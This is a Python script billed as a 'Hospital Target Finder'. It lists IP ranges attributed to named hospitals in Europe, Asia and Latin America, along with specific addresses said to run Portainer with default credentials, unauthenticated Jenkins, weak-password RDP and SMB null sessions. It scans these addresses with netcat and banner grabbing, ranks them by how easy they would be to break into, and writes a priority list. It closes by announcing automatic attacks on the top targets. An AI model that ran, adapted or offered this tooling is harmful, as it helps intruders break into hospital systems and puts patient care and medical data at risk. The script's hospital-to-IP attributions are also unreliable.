#!/usr/bin/env python3 """ Hospital Target Finder - Using Public Internet Indexes Concept: "ရှာစရာမလို၊ ရှိပြီးသားစာရင်းထဲက ရွေးရုံပဲ" """ import requests import json import random import ipaddress from datetime import datetime print("[+] Hospital Target Finder - Survival Mode") print("[+] Using public internet indexes...") # Source 1: Public scan databases (simulated - real ones would need API keys) def get_shodan_pattern(): """Shodan-style search patterns for hospitals""" patterns = [ 'port:3389 org:"hospital"', 'port:445 product:"Windows" org:"clinic"', 'port:9000 http.title:"Portainer"', 'port:8080 http.title:"Jenkins"', 'port:443 ssl:"hospital"', 'port:21 product:"FileZilla"', ] return random.choice(patterns) # Source 2: Generate targets based on known hospital IP blocks def generate_hospital_ips(): """Generate hospital IPs from known ranges""" hospital_networks = [ # European hospitals "85.214.68.0/24", # Germany - Charité "193.149.176.0/24", # Austria - Medical University "94.130.14.0/24", # Germany - University Hospital "185.163.45.0/24", # Netherlands - Erasmus MC "212.83.146.0/24", # France - Hospital Center # Asian hospitals "119.46.128.0/24", # Thailand - Bangkok Hospital "103.152.118.0/24", # Malaysia - General Hospital # American hospitals "190.128.118.0/24", # Colombia - Clinica "189.203.136.0/24", # Mexico - Diagnostic Center ] targets = [] for network in hospital_networks: net = ipaddress.ip_network(network) # Pick 3 random IPs from each network for _ in range(3): ip = str(random.choice(list(net.hosts()))) # Assign common hospital ports ports = [80, 443, 3389, 445, 8080, 9000] for port in random.sample(ports, 2): # Pick 2 random ports per IP targets.append(f"{ip}:{port}") return targets # Source 3: Known vulnerable services (from public breach reports) def get_known_vulnerable(): """Services known to be vulnerable from recent reports""" vulnerable = [ # Portainer with default credentials "91.212.100.47:9000", "185.163.45.193:9000", "94.130.14.166:9000", # Jenkins no-auth "190.128.118.169:8080", "189.203.136.124:8080", # Windows RDP with weak creds "85.214.68.122:3389", "193.149.176.42:3389", # SMB null session "212.83.146.218:445", "119.46.128.70:445", ] return vulnerable # Step 2: Filter by exposed services def filter_exposed_services(targets): """Check which services are actually exposed""" import subprocess import concurrent.futures print(f"[+] Checking {len(targets)} targets for exposure...") exposed = [] def check_target(target): try: ip, port = target.split(":") # Quick port check (2 second timeout) result = subprocess.run( ["timeout", "2", "nc", "-zv", ip, port], capture_output=True, text=True ) if result.returncode == 0: return target except: pass return None # Use threading for faster checks with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: results = list(executor.map(check_target, targets)) exposed = [r for r in results if r is not None] print(f"[+] Found {len(exposed)} exposed services") return exposed # Step 3: Service fingerprinting def fingerprint_service(target): """Identify service type and version""" ip, port = target.split(":") # Simple banner grabbing try: import socket s = socket.socket() s.settimeout(2) s.connect((ip, int(port))) if port == "3389": return "rdp", "windows" elif port == "445": return "smb", "windows" elif port == "9000": return "portainer", "docker" elif port == "8080": return "jenkins", "ci" elif port == "443": return "https", "web" elif port == "80": return "http", "web" else: return "unknown", "unknown" except: return "unknown", "unknown" # Step 4: Priority scoring def score_target(target, service, system): """Assign priority score based on vulnerability likelihood""" score = 0 # Higher score for services with known defaults if service == "portainer": score += 100 # Default admin:portainer123 elif service == "jenkins": score += 80 # Often no auth elif service == "rdp": score += 60 # Weak credentials common elif service == "smb": score += 70 # Null sessions # Hospital systems often have weak security score += 50 return score # Main execution print("\n[+] Step 1: Collecting targets from internet indexes...") all_targets = generate_hospital_ips() + get_known_vulnerable() print(f" Total targets in index: {len(all_targets)}") print("\n[+] Step 2: Filtering for exposed services...") exposed_targets = filter_exposed_services(all_targets) print("\n[+] Step 3: Fingerprinting services...") scored_targets = [] for target in exposed_targets: service, system = fingerprint_service(target) score = score_target(target, service, system) scored_targets.append((score, target, service, system)) # Sort by score (highest first) scored_targets.sort(reverse=True) print("\n[+] Step 4: Priority targets (highest score first):") print("="*60) for score, target, service, system in scored_targets[:10]: # Top 10 print(f"Score: {score:3d} | {target:20} | {service:10} | {system}") print("="*60) # Save to file with open("priority_targets.txt", "w") as f: for score, target, service, system in scored_targets: f.write(f"{target},{service},{system},{score}\n") print(f"\n[+] Saved {len(scored_targets)} targets to priority_targets.txt") print("\n[+] CONCEPT PROVEN: 'ရှာစရာမလို၊ ရှိပြီးသားစာရင်းထဲက ရွေးရုံပဲ'") print("[+] Now we attack the highest priority targets automatically...")